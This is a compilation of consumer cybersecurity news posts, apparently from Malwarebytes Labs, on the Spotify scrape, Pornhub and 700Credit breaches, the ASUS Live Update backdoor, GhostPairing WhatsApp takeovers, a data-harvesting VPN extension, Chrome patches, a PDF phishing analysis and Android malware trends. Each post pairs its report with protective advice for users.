IT NEWS

Hacktivist group Anna’s Archive claims to have scraped almost all of Spotify’s catalog and is now seeding it via BitTorrent, effectively turning a streaming platform into a roughly 300 TB pirate “preservation archive.”

On its blog, the group states:

“A while ago, we discovered a way to scrape Spotify at scale. We saw a role for us here to build a music archive primarily aimed at preservation.”

Spotify insists that the hacktivists obtained no user data. Still, the incident highlights how large‑scale scraping, digital rights management (DRM) circumvention, and weak abuse controls can turn major content platforms into high‑value targets.

Anna’s Archive claims it obtained metadata for around 256 million tracks and audio files for roughly 86 million songs, totaling close to 300 TB. Reportedly, this represents about 99.9% of Spotify’s catalog and roughly 99.6% of all streams.

Spotify says it has “identified and disabled the nefarious user accounts that engaged in unlawful scraping” and implemented new safeguards.

From a security perspective, this incident is a textbook example of how scraping can escalate beyond “just metadata” into industrial‑scale content theft. By combining public APIs, token abuse, rate‑limit evasion, and DRM bypass techniques, attackers can extract protected content at scale. If you can create or compromise enough accounts and make them appear legitimate, you can chip away at content protections over time.

The “Spotify scrape” will likely be framed as a copyright story. But from a security angle, it serves as a reminder: if a platform exposes content or metadata at scale, someone will eventually automate access to it, weaponize it, and redistribute it.

And hiding behind violations of terms and conditions—which have never stopped criminals—is not effective security control.

How does this affect you?

There is currently no indication that passwords, payment details, or private playlists were exposed. This incident is purely about content and metadata, not user databases. That said, scammers may still claim otherwise. Be cautious of messages alleging your account data was compromised and asking for your login details.

Some general Spotify security tips, to be on the safe side:

• If you have reused your Spotify password elsewhere or shared your credentials, consider changing your password for peace of mind.
• Regularly review active sessions on streaming services and revoke anything you do not recognize. Spotify does not offer per-device session management, but you can sign out of all devices via Account > Settings and privacy on the Spotify website.
• Avoid unofficial downloaders, converters, or “Spotify mods” that ask for your login or broad OAuth permissions. These tools often rely on the same kind of scraping infrastructure—or worse, function as credential-stealing malware.

We don’t just report on threats – we help protect your social media

Cybersecurity risks should never spread beyond a headline. Protect your social media accounts by using Malwarebytes Identity Theft Protection.

After a recent data breach that affected Pornhub Premium members, Pornhub has updated its online statement to warn users about potential direct contact from cybercriminals.

“We are aware that the individuals responsible for this incident have threatened to contact impacted Pornhub Premium users directly. You may therefore receive emails claiming they have your personal information. As a reminder, we will never ask for your password or payment information by email.”

Pornhub is one of the world’s most visited adult video-sharing websites, allowing users to view content anonymously or create accounts to upload and interact with videos.

Pornhub has reported that on November 8, 2025, a security breach at third-party analytics provider Mixpanel exposed “a limited set of analytics events for certain users.” Pornhub stressed that this was not a breach of Pornhub’s own systems, and said that passwords, payment details, and financial information were not exposed.

Mixpanel confirmed it experienced a security incident on November 8, 2025, but disputes that the Pornhub data originated from that breach. The company stated there is:

 “No indication that this data was stolen from Mixpanel during our November 2025 security incident or otherwise.”

Regardless of the source, cybercriminals commonly attempt to monetize stolen user data through direct extortion. At the moment, it is unclear how many users are affected, although available information suggests that only Premium members had their data exposed.

In October, we reported that one in six mobile users are targeted by sextortion scams. Sextortion is a form of online blackmail where criminals threaten to share a person’s private, nude, or sexually explicit images or videos unless the victim complies with their demands—often for more sexual content, sexual favors, or money.

Having your email address included in a dataset of known Pornhub users makes you a likely target for this type of blackmail.

How to stay safe from sextortion

Unless you used a dedicated throwaway email address to sign up for Pornhub Premium, you should be prepared to receive a sextortion-type email. If one arrives:

• Any message referencing your Pornhub use, searches, or payment should be treated as an attempt to exploit breached or previously leaked data.
• Never provide passwords or payment information by email. Pornhub has stated it will not ask for these.
• Do not respond to blackmail emails. Ignore demands, do not pay, and do not reply—responding confirms your address is actively monitored.
• Save extortion emails, including headers, content, timestamps, and attachments, but do not open links or files. This information can support reports to your email provider, local law enforcement, or cybercrime units.
• Change your Pornhub password (if your account is still active) and ensure it’s unique and not reused anywhere else.
• Turn on multi-factor authentication (MFA) for your primary email account and any accounts that could be used for account recovery or identity verification.
• Review your bank and card statements for unfamiliar charges and report any suspicious transactions at once.
• If you used a real-name email address for Pornhub, consider moving sensitive subscriptions to a separate, pseudonymous email going forward.

Use STOP, our simple scam response framework to help protect against scams. 

• S—Slow down: Don’t let urgency or pressure push you into action. Take a breath before responding. Legitimate businesses like your bank or credit card don’t push immediate action.  
• T—Test them: If you answered the phone and are feeling panicked about the situation, likely involving a family member or friend, ask a question only the real person would know—something that can’t be found online. 
• O—Opt out: If it feels off, hang up or end the conversation. You can always say the connection dropped. 
• P—Prove it: Confirm the person is who they say they are by reaching out yourself through a trusted number, website or method you have used before. 

Should you have doubts about the legitimacy of any communications, submit them to Malwarebytes Scam Guard. It will help you determine whether it’s a scam and provide advice on how to act.

We don’t just report on threats—we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your, and your family’s, personal information by using identity protection.

Last week on Malwarebytes Labs:

• CISA warns ASUS Live Update backdoor is still exploitable, seven years on
• The ghosts of WhatsApp: How GhostPairing hijacks accounts
• Chrome extension slurps up AI chats after users installed it for privacy
• Two Chrome flaws could be triggered by simply browsing the web: Update now
• Inside a purchase order PDF phishing campaign
• SoundCloud, Pornhub, and 700Credit all reported data breaches, but the similarities end there
• Android mobile adware surges in second half of 2025
• Photo booth flaw exposes people’s private pictures online
• Google is discontinuing its dark web report: why it matters
• Pig butchering is the next “humanitarian global crisis” (Lock and Code S06E25)
• PayPal closes loophole that let scammers send real emails with fake purchase notices

On the ThreatDown blog:

• AI-orchestrated cyberattacks

Stay safe!

We don’t just report on threats—we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your, and your family’s, personal information by using identity protection.

Recently, the Cybersecurity and Infrastructure Security Agency (CISA) added (along with two others) a vulnerability in ASUS Live Update to its catalog of Known Exploited Vulnerabilities (KEV).

The KEV catalog lists vulnerabilities that are known to be exploited in the wild and sets patch deadlines for Federal Civilian Executive Branch (FCEB) agencies. When CISA adds an issue to this list, it’s a strong signal that exploitation is real, ongoing, and urgent.

The ASUS Live Update Embedded Malicious Code vulnerability, tracked as CVE-2025-59374 (with a CVSS score of 9.3), affects Live Update, a utility commonly used to deliver firmware and software updates to ASUS devices.

This isn’t the first time ASUS Live Update has been linked to serious security incidents. In 2019, ASUS responded to media reports about attacks on the Live Update tool by advanced persistent threat (APT) groups, stating that:

“A small number of devices have been implanted with malicious code through a sophisticated attack on our Live Update servers in an attempt to target a very small and specific user group.”

Later investigations revealed that a sophisticated supply chain attack mounted in 2018, attributed to Chinese state-sponsored attackers, had inserted a backdoor into ASUS Live Update. The attack was particularly effective because that utility came preinstalled on most ASUS devices and was used to the automatically update BIOS, UEFI, drivers, and other components.

CISA now notes that the affected devices could be abused to perform unintended actions if certain conditions are met. Originally, the attackers reportedly targeted only around 600 specific devices, based on hashed MAC addresses hardcoded in various versions of the tool. This was despite the fact that millions of users may have downloaded the backdoored utility.

Support for the ASUS Live Update application has since been discontinued. The final intended version of ASUS Live Update was 3.6.15, but it will continue to provide software updates. This is likely why a CVE was assigned and why the vulnerability was added to the KEV catalog. There was no official “why now” statement from ASUS, MITRE, or CISA, but the timing aligns with a legacy, end-of-support product being reclassified as a vulnerability with confirmed active exploitation.

What do ASUS users need to do?

First of all, make sure you’re running a clean version of the utility. ASUS urges users to update to version 3.6.8 or later to address known security issues.

• Right-click the ASUS Live Update icon at the bottom-right corner of your Windows screen
• Click About to see the version information as the shown in the picture below.
  
• If you are on an older version, open the program and click Check update immediately
• ASUS Live Update will automatically find the latest driver and utility.
• Click Install
• After updating, recheck and ensure it shows “No updates.”

Alternatively, you can download and install the latest version manually. ASUS’ own support article describes the only official way to get the current Live Update package:​

1. Go to the ASUS Official Website (asus.com)
2. Use the search box to find your exact model (e.g., UX580GD)
3. Open the product page and click Support → Driver & Tools
4. Select your operating system (e.g., Windows 10/11 64-bit).​
5. In the Utilities section, locate ASUS Live Update and click Download

This is as close as we could get you to a “direct” official download. The URL is different for every model and ASUS does not provide a central Live Update installer directory. While this makes it harder than it maybe should be, we do recommend using this official download. Given the history of supply chain abuse involving this tool, downloading it from third-party sources is a risk not worth taking.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Researchers have found an active campaign aimed at taking over WhatsApp accounts. They’ve called this attack GhostPairing because it tricks the victim into completing WhatsApp’s own device-pairing flow, silently adding the attacker’s browser as an invisible linked device on the account.

Ghost of WhatsApp Past: When it was just you

Device pairing lets WhatsApp users add additional devices to their account so they can read and reply to messages from a laptop or through WhatsApp Web.

Compared to similar platforms, WhatsApp’s main strengths are its strong end-to-end encryption and seamless cross-platform use. But cybercriminals have found a way to abuse that cross-platform use to bypass the encryption.

In the Ghost of WhatsApp Past, everything looks normal. It’s just you and the devices you meant to connect. The same mechanism that makes life easier later gets abused to let in an uninvited guest. And that renders the end-to-end encryption useless when the attacker gains direct access to the account.

Ghost of WhatsApp Present: The “I found your photo” moment

So, all is well. Until the target receives a message along the lines of “Hey, check this, I found your photo!” accompanied by a link.

The link, and the website it leads to, are designed to look like they belong to Facebook (which, like WhatsApp, is owned by Meta).

This fake login page provides instructions to log in with their phone number to continue or to verify before viewing the photo. The scammers then use the provided phone number to submit a WhatsApp “device pairing” request for it.

The researchers observed two variants of the attack. One that provides a QR code to scan with WhatsApp on your phone. The other sends a numeric code and tells the user to enter it into WhatsApp to confirm a login.

In the second scenario, the victim opens WhatsApp, sees the pairing prompt, types the code, and believes they are completing a routine verification step, when in fact they have just linked the attacker’s browser as a new device.

This is the attacker’s preferred approach. In the first, the browser-based QR-code occurs on the same device as the WhatsApp QR-code scan—QR codes normally expect a second device—and might give people the chance to think about what’s really going on.

Ghost of WhatsApp Future: When the ghost settles in

With the new access to your WhatsApp account, the criminals can:

• Read all your new and synced messages.
• Download photos, videos, and voice notes.
• Send the same “photo” lure to your contacts and spread the scam.
• Impersonate you in direct and group chats.
• Harvest messages, images, and other information to use in future scams, social engineering, and extortion.

And they can do much of this before the real account owner notices that something is wrong.

What Scrooge can learn from all this

It’s not the first time scammers have used tricks like these to take over accounts. Facebook has seen many waves of similar scams.

There are a few basic measures you can take to avoid falling for lures like these.

• Don’t follow unsolicited links sent to you, even if they’re from an account you trust. Verify with the sender that it’s safe. In some cases, you’ll be helpfully warning them their account is compromised.
• Enable Two‑Step Verification in WhatsApp. This adds a PIN that attackers cannot set or change, reducing the impact of other takeover techniques.
• Read prompts and notifications. Many of us have trained ourselves to click all the right buttons to get through the flow as quickly as possible without reading what they’re actually doing, but it’s a dangerous habit.

If you have fallen victim to this, here’s what to do.

• Tell your WhatsApp contacts that your account may have been abused and not to click any “photo” links or verification requests that might have come from you.
• Immediately revoke access: go to Settings → Linked Devices and log out of all browsers and desktops you do not explicitly use. When in doubt, remove everything and re‑link only the devices you own.

We don’t just report on threats – we help protect your social media

Cybersecurity risks should never spread beyond a headline. Protect your social media accounts by using Malwarebytes Identity Theft Protection.

This case highlights a growing grey area in consumer privacy: data collection that is technically disclosed, but so far outside user expectations that most people would never knowingly agree to it.

The next time you tell an AI chat assistant your deepest secrets, think twice; you never know who (or what) might be listening. More than seven million users of a VPN extension for Google Chrome and Microsoft Edge found that out the hard way this week after researchers at Koi Security revealed the browser extension had been logging users’ AI chats and sending them to a data broker.

Urban VPN Proxy looked like a reputable program. It sat in the Chrome Web Store with a 4.7-star rating and Google’s “Featured” badge, which is meant to indicate that an extension meets higher standards for user experience and design. More than six million people downloaded the Chrome version of the tool, which ironically claims to protect users’ online privacy. Another 1.3 million installed it on Microsoft Edge.

The extension was originally benign, but then on July 9, 2025 its publisher, Urban Cybersecurity, shipped version 5.5.0. According to Koi Security, that update introduced code that intercepted every conversation users had with eight AI assistant platforms: ChatGPT, Claude, Gemini, Microsoft Copilot, Perplexity, DeepSeek, Grok (xAI), and Meta AI.

The extension intercepted chat prompts from the user’s browser, along with responses from the AI. It then reportedly packaged them up and sent them to Urban Cybersecurity’s parent company, BiScience (B.I Science (2009) Ltd). That is a data broker company, which collects browsing history and device IDs from millions of users.

As Koi Security points out in its report, Urban Cybersecurity does mention AI data collection in the consent screen that it shows during product setup. It says:

“…we process certain browsing data such as pages you visit, your network connection, ChatAI communication, and security signals, as outlined in our Privacy Policy.”

The privacy policy further explains what data it collects and says that it discloses the data for marketing analytics purposes.

There are two problems with that.

First, the extension silently auto-updates on Chrome and Microsoft Edge browsers, as Koi Security points out. That means users who installed an earlier, non-harvesting version installed would have been automatically upgraded to the chat-slurping version in July and been none the wiser—unless they happened to read updated privacy policies for fun.

fromSecond, the Chrome Web Store listing reportedly described the product as protecting people from entering personal information into AI chatbots. That claim is hard to square with the fact that the extension captures and exfiltrates AI chats regardless of whether its protection features are turned on, according to Koi.

The researchers also found that seven other extensions from the same publisher contained identical harvesting code, bringing the total number of affected users to more than eight million. Koi Security published a list of those extensions in its report.

Why data brokers love AI chat

With people inclined to tell AI sessions increasingly personal things, this secretive harvesting should worry us. Set aside for a minute those who confess to crimes, or those who pour out deeply private thoughts while using AI as a form of therapy. Many other chats are filled with things that feel more mundane but are still highly sensitive: job advice (people have shared full resumes with AI chats), medical symptoms, family planning questions, study materials, and legal queries.

Those conversations are often far more detailed and revealing than traditional search engine queries. If data brokers obtain them, they can mine the content for personal insights and link it with other data they already hold about you.

This episode reinforces two pieces of advice that we’ve given before. The first is to be careful which browser extensions you install, and which VPN services you use. Not all are what they seem.

Second, be careful what you tell AI assistants. Even if nothing is intercepting the conversation locally, the company operating the AI itself might be made to hand over chat data, as OpenAI was earlier this month.

Google’s “Featured” badge says extensions “follow our technical best practices and meet a high standard of user experience and design” but this seems to have been one that slipped through the next. As of last night, Urban Proxy VPN and Urban Cybersecurity’s other apps appeared to have been removed from the Chrome Web Store. The ones identified by Koi Security on the Microsoft Edge Add-ons store were still available, though.

If you used any of these extensions, were unaware of the situation and are unhappy about it, you should assume that any AI chats since July 9 this year may have been compromised. To remove extensions, you can do so in Chrome by visiting chrome://extensions and in Edge by visiting edge://extensions. You may also want to reset passwords and clear browser caches and cookies.

We don’t just report on privacy—we offer you the option to use it.

Privacy risks should never spread beyond a headline. Keep your online privacy yours by using Malwarebytes Privacy VPN.

Google issued an extra patch addressing two security vulnerabilities in Chrome, both of which can be triggered remotely by an attacker when a user visits a specially crafted, malicious web page.

Chrome is by far the world’s most popular browser, with an estimated 3.4 billion users. That makes it a massive target. When Chrome has a security flaw that can be triggered just by visiting a website, billions of users are exposed until they update.

That’s why it’s important to install these patches promptly. Staying unpatched means you could be at risk just by browsing the web. Attackers often try to exploit browser vulnerabilities quickly, before most users have a chance to update. Always let Chrome update itself, and don’t delay restarting it, as updates usually fix exactly this kind of risk.

How to update Chrome

The latest version number is 143.0.7499.146/.147 for Windows and macOS, and 143.0.7499.146 for Linux. So, if your Chrome is on version 143.0.7499.146 or later, it’s protected from these vulnerabilities.

The easiest way to update is to allow Chrome to update automatically, but you can end up lagging behind if you never close your browser or if something goes wrong—such as an extension stopping you from updating the browser.

To update manually, click the More menu (three dots), then go to Settings > About Chrome. If an update is available, Chrome will start downloading it. Restart Chrome to complete the update, and you’ll be protected against these vulnerabilities.

You can also find step-by-step instructions in our guide to how to update Chrome on every operating system.

Technical details

One of the vulnerabilities was found in the WebGPU web graphics API, which allows for graphics processing, games, and more, as well as AI and machine learning applications. This vulnerability, tracked as CVE-2025-14765 is a use-after-free vulnerability that could allow a remote attacker to potentially exploit heap corruption via a crafted HTML page.

Use-after-free is a class of vulnerability caused by incorrect use of dynamic memory during a program’s operation. If, after freeing a memory location, a program does not clear the pointer to that memory, an attacker may be able to use the error to manipulate the program.

Heap corruption occurs when a program inadvertently damages the allocator’s view of the heap, which can lead to unexpected alterations in memory. The heap is a region of memory used for dynamic memory allocation.

The other vulnerability, known as CVE-2025-14766 was—once again—found in the V8 engine as an out-of-bounds read and write.

V8 is the engine that Google developed for processing JavaScript, and it has seen more than its fair share of bugs.

An out-of-bounds read and write vulnerability means an attacker may be able to manipulate parts of the device’s memory that should be out of their reach. Such a flaw allows a program to read or write outside the bounds the program sets, enabling attackers to manipulate other parts of the memory allocated to more critical functions. Attackers could write code to a part of the memory where the system executes it with permissions that the program and user should not have.

In this case, the vulnerability could be exploited when the engine processes specially crafted HTML content, such as a malicious website.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

A PDF named “NEW Purchase Order # 52177236.pdf” turned out to be a phishing lure. So we analyzed the phishing script behind it.

A customer contacted me when Malwarebytes blocked the link inside a “purchase order” email they had received.

When I examined the attachment, it soon became clear why we blocked it.

The visible content of the PDF showed a button prompting the recipient to view the purchase order. Hovering over the button revealed a long URL that included a reference to a PDF viewer. While this might fool some people at first glance, a closer look raised red flags:

Since I’m rarely able to control my curiosity, I temporarily added an exclusion to Malwarebytes’ web protection so I could see where the link would take me. The destination was a website displaying a login form with the target’s email address already filled in (the address shown here was fabricated by me):

The objective was clear: phishing. But the site’s source code didn’t reveal much.

The most likely objective was to harvest business email addresses and their passwords. Attackers commonly test these credentials against enterprise services such as Microsoft Outlook, Google Workspace, VPNs, file-sharing platforms, and payroll systems. The deliberately vague prompt for a “business email” increases the likelihood that users will provide corporate credentials rather than personal ones.

There was also a small personalization touch. The “Estimado” greeting sets a professional tone and is common in business correspondence across Spanish-speaking regions.

For a full analysis read on, but the real clue is that the harvested credentials accompanied additional information about the victim’s browser, operating system, language, cookies, screen size, and location. This data was sent directly to the scammer’s account on Telegram, where it’s likely to be used to compromise the business network or sold on to other cybercriminals.

A quick search on VirusTotal showed that there were several PDF files linking to the exact same ionoscloud.com subdomain.

Analysis

As I pointed out earlier, the source code of the initial phishing page did not reveal a lot. These are probably auto-generated templates that can be planted on any website, allowing attackers a fast rotation.

ionoscloud.com belongs to IONOS Cloud, the cloud infrastructure division of IONOS, a major European hosting company. It offers services similar to Amazon AWS or Microsoft Azure, including hosting for websites and files. Scammers specifically choose reputable cloud platforms like IONOS Cloud because of the “halo effect” of being hosted at a well-known domain, which means security companies can’t just block the whole domain.

The criminals also get the flexibility to quickly spin up, modify, or tear down phishing sites and continue to evade detection by moving to new URLs or storage buckets.

So, we followed the trail to a JavaScript file, which turned out to be obfuscated script—and a long one at that. But the end of it looked promising.

Since it was still unclear at this point what it was up to, I made a change to the script to avoid infection and which allowed me to get the source code without executing the script. To achieve this, I replaced the last line of the original script with code that exports the next layer to an HTML file.

The next obfuscation layer turned out to be easy. All it contained was a long string that needed to be unescaped. Because of the length, I used an online decoder to do that for me.

This showed me the code for the actual form that the target would see—and the goal of the whole phishing expedition.

The part that did the actual harvesting was hidden in another script.

This was still pretty long and obfuscated but by analyzing the code and giving the functions readable names I managed to find out which information the script gathered. For example, the script uses the ipapi location service:

And I found out where it sent the details.

Any credentials entered on the phishing page are POSTed directly to the attacker’s Telegram bot and immediately forwarded to their chosen Telegram chat for collection. The Telegram chat ID hardcoded in the script was 5485275217.

How to stay safe

The advice here is pretty standard. (Do as our customer did, not as I did.)

• Phishing and malware campaigns frequently use PDF files, so treat them like any other attachment: don’t open until the trusted sender confirms sending you one.
• Never click links inside attachments without verifying with the sender, especially if you weren’t expecting the message or don’t know the sender.
• Always check the address of any website asking for your login details. A password manager can help here, as it won’t auto-fill credentials on a fake site.
• Use real-time anti-malware protection, preferably with a web protection component. Malwarebytes blocks the domains associated with this campaign.
• Use an email security solution that can detect and quarantine suspicious attachments.

Pro tip: Malwarebytes Scam Guard recognized the screenshot of the PDF as a phishing attempt and provided advice on how to deal with it.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Android users spent 2025 walking a tighter rope than ever, with malware, data‑stealing apps, and SMS‑borne scams all climbing sharply while attackers refined their business models around mobile data and access.

Looking back, we may view 2025 as the year when one-off scams were replaced on the score charts by coordinated, well-structured, attack frameworks.

Comparing two equal six‑month periods—December 2024 through May 2025 versus June through November 2025—our data shows Android adware detections nearly doubled (90% increase), while PUP detections increased by roughly two‑thirds and malware detections by about 20%.

The strong rise in SMS-based attacks we flagged in June indicates that 2025 is the payoff year. The capabilities to steal one‑time passcodes are no longer experimental; they’re being rolled into campaigns at scale.

The shift from nuisances to serious crime

Looking at 2024 as a whole, malware and PUPs together made up almost 90% of Android detections, with malware rising to about 43% of the total and potentially unwanted programs (PUPs) to 45%, while adware slid to around 12%.

That mix tells an important story: Attackers are spending less effort on noisy annoyance apps and more on tools that can quietly harvest data, intercept messages, or open the door to full account takeover.

But that’s not because adware and PUP numbers went down.

Shahak Shalev, Head of AI and Scam Research at Malwarebytes pointed out: 

The holiday season may have just kicked off, but cybercriminals have been laying the groundwork for months for successful Android malware campaigns. In the second half of 2025, we observed a clear escalation in mobile threats. Adware volumes nearly doubled, driven by aggressive families like MobiDash, while PUP detections surged, suggesting attackers are experimenting with new delivery mechanisms. I urge everyone to stay vigilant over the holidays and not be tempted to click on sponsored ads, pop-ups or shop via social media. If an offer is too good to be true, it usually is.”  

For years, Android/Adware.MobiDash has been one of the most common unwanted apps on Android. MobiDash comes as an adware software development kit (SDK) that developers (or repackagers) bolt onto regular apps to flood users with pop‑ups after a short delay. In 2025 it still shows up in our stats month after month, with thousands of detections under the MobiDash family alone.

So, threats like MobiDash are far from gone, but they increasingly become background noise against more serious threats that now stand out.

Over that same December–May versus June–November window, adware detections nearly doubled, PUP detections rose by about 75%, and malware detections grew by roughly 20%.

In the adware group, MobiDash alone grew its monthly detection volume by more than 100% between early and late 2025, even as adware as a whole remained a minority share of Android threats. In just the last three months we measured, MobiDash activity surged by about 77%, with detections climbing steadily from September through November.

A more organized approach

Rather than relying on delivering a single threat, we found cybercriminals are chaining components like droppers, spying modules, and banking payloads into flexible toolkits that can be mixed and matched per campaign.

What makes this shift worrying is the breadth of what information stealers now collect. Beyond call logs and location, many samples are tuned to monitor messaging apps, browser activity, and financial interactions, creating detailed behavioral profiles that can be reused across multiple fraud schemes. As long as this data remains monetizable on underground markets, the incentive to keep these surveillance ecosystems running will only grow.

As the ThreatDown 2025 State of Malware report points out:

“Just like phishing emails, phishing apps trick users into handing over their usernames, passwords, and two-factor authentication codes. Stolen credentials can be sold or used by cybercriminals to steal valuable information and access restricted resources.”

Predatory finance apps like SpyLoan and Albiriox typically use social engineering (sometimes AI-supported) promising fast cash, low-interest loans, and minimal checks. Once installed, they harvest contacts, messages, and device identifiers, which can then be used for harassment, extortion, or cross‑platform identity abuse. Combined with access to SMS and notifications, that data lets operators watch victims juggle real debts, bank balances, and private conversations.

One of the clearest examples of this more organized approach is Triada, a long-lived remote access Trojan (RAT) for Android. In our December 2024 through May 2025 data, Triada appeared at relatively low but persistent levels. Its detections then more than doubled in the June–November period, with a pronounced spike late in the year.

Triada’s role is to give attackers a persistent foothold on the device: Once installed, it can help download or launch additional payloads, manipulate apps, and support on‑device fraud—exactly the kind of long‑term ‘infrastructure’ behavior that turns one‑off infections into ongoing operations.

Seeing a legacy threat like Triada ramp up in the same period as newer banking malware underlines that 2025 is when long‑standing mobile tools and fresh fraud kits start paying off for attackers at the same time.

If droppers, information stealers, and smishing are the scaffolding, banking Trojans are the cash register at the bottom of the funnel. Accessibility abuse, on‑device fraud, and live screen streaming, can make transactions happen inside the victim’s own banking session rather than on a cloned site. This approach sidesteps many defenses, such as device fingerprinting and some forms of multi-factor authentication (MFA). These shifts show up in the broader trend of our statistics, with more detections pointing to layered, end‑to‑end fraud pipelines.

Compared to the 2024 baseline, where phishing‑capable Android apps and OTP stealers together made up only a small fraction of all Android detections, the 2025 data shows their share growing by tens of percentage points in some months, especially around major fraud seasons.

What Android users should do now

Against this backdrop, Android users need to treat mobile security with the same seriousness as desktop and server environments. This bears repeating, as Malwarebytes research shows that people are 39% more likely to click a link on their phone than on their laptop.

 A few practical steps make a real difference:​

• Prefer official app stores, but do not trust them blindly. Scrutinize developer reputation, reviews, and install counts, especially for financial and “utility” apps that ask for sensitive permissions.​
• Be extremely cautious with permissions like SMS access, notification access, Accessibility, and “Display over other apps,” which show up again and again in infostealers, banking Trojans, and OTP-stealing campaigns.​​
• Avoid sideloading and gray‑market firmware unless absolutely necessary. When possible, choose devices with a clear update policy and apply security patches promptly.​
• Treat unexpected texts and messages—particularly those about payments, deliveries, or urgent account issues—as hostile until proven otherwise and never tap links or install apps directly from them.​​
• Run up-to-date real-time mobile security software that can detect malicious apps, block known bad links, and flag suspicious SMS activity before it turns into full account compromise.​

Mobile threats in 2025 are no longer background noise or the exclusive domain of power users and enthusiasts. For many people, the phone is now the main attack surface—and the main gateway to their money, identity, and personal life.

We don’t just report on phone security—we provide it

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

Comparing data breaches is like comparing apples and oranges. They differ on many levels. To news media, the size of the brand, how many users were impacted, and how it was done often dominate the headlines. For victims, what really matters is the type of information stolen. And for the organizations involved, the focus is on how they will handle the incident. So, let’s have a look at the three that showed up in the news feeds today.

700Credit

700Credit is a US provider of credit reports, preliminary credit checks, identity verification, fraud detection, and compliance tools for automobile, recreational vehicle, powersports, and marine dealerships.

In a notice on its website, 700Credit informed media, partners, and affected individuals that it suffered a third-party supply-chain attack in late October 2025. According to the notice, an attacker gained unauthorized access to personally identifiable information (PII), including names, addresses, dates of birth, and Social Security numbers (SSNs). The breach involves data collected between May and October, impacting roughly 5.6 million people.

The supply-chain attack demonstrates the importance of how you handle attacks. Reportedly, 700Credit communicates with more than 200 integration partners through application programming interfaces (APIs). When one of the partners was compromised in July, they failed to notify 700Credit. As a result, unnamed cybercriminals broke into that third-party’s system and exploited an API used to pull consumer information.

700Credit shut down the exposed third-party API, notified the FBI and FTC, and is mailing letters to victims offering credit monitoring while coordinating with dealers and state regulators.

SoundCloud

SoundCloud is a leading audio streaming platform where users can upload, promote, stream, and share music, podcasts, and other audio content.

SoundCloud posted a notice on its website stating that it recently detected unauthorized activity in an ancillary service dashboard. Ancillary services refer to specialized functions that help maintain stability and reliability. When SoundCloud contained the attack, it experienced denial-of-service attacks, two of which were able to temporarily disable its platform’s availability on the web.

An investigation found that no sensitive data such as financial or password data was accessed. The exposed data consisted of email addresses and information already visible on public SoundCloud profiles. The company estimates the incident affected roughly 20% of its user base.

Pornhub

Pornhub is one of the world’s most visited adult video-sharing websites, allowing users to view content anonymously or create accounts to upload and interact with videos.

Reportedly, Pornhub disclosed that on November 8, 2025, a security breach at third-party analytics provider Mixpanel exposed “a limited set of analytics events for certain users.” Pornhub stressed that this was not a breach of Pornhub’s own systems, and said that passwords, payment details, and financial information were not exposed. Mixpanel, however, disputes that the data originated from its November 2025 security incident.

According to reports, the ShinyHunters ransomware group claims to have obtained about 94 GB of data containing more than 200 million analytics records tied to Pornhub Premium activity. ShinyHunters shared a data sample with BleepingComputer that included a Pornhub Premium member’s email address, activity type, location, video URL, video name, keywords associated with the video, and the time the event occurred.

ShinyHunters has told BleepingComputer that it sent extortion demands to Pornhub, and the nature of the exposed data creates clear risks for blackmail, outing, and reputational harm—even though no Social Security numbers, government IDs, or payment card details are in the scope of the breach.

Comparing apples and oranges

As you can see, these are three very different data breaches. Not just in how they happened, but in what they mean for the people affected.

While email addresses and knowing that someone uses SoundCloud could be useful for phishers and scammers, it’s a long way from the leverage that comes with detailed records of Pornhub Premium activity. If that doesn’t get you on the list of a “hello pervert” scammer, I don’t know what will.

But undoubtedly the most dangerous one for those affected is the 700Credit breach which provides an attacker with enough information for identity theft. In the other cases an attacker will have to penetrate another defense layer, but with a successful identity theft the attacker has reached an important goal.

We don’t just report on threats—we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your, and your family’s, personal information by using identity protection.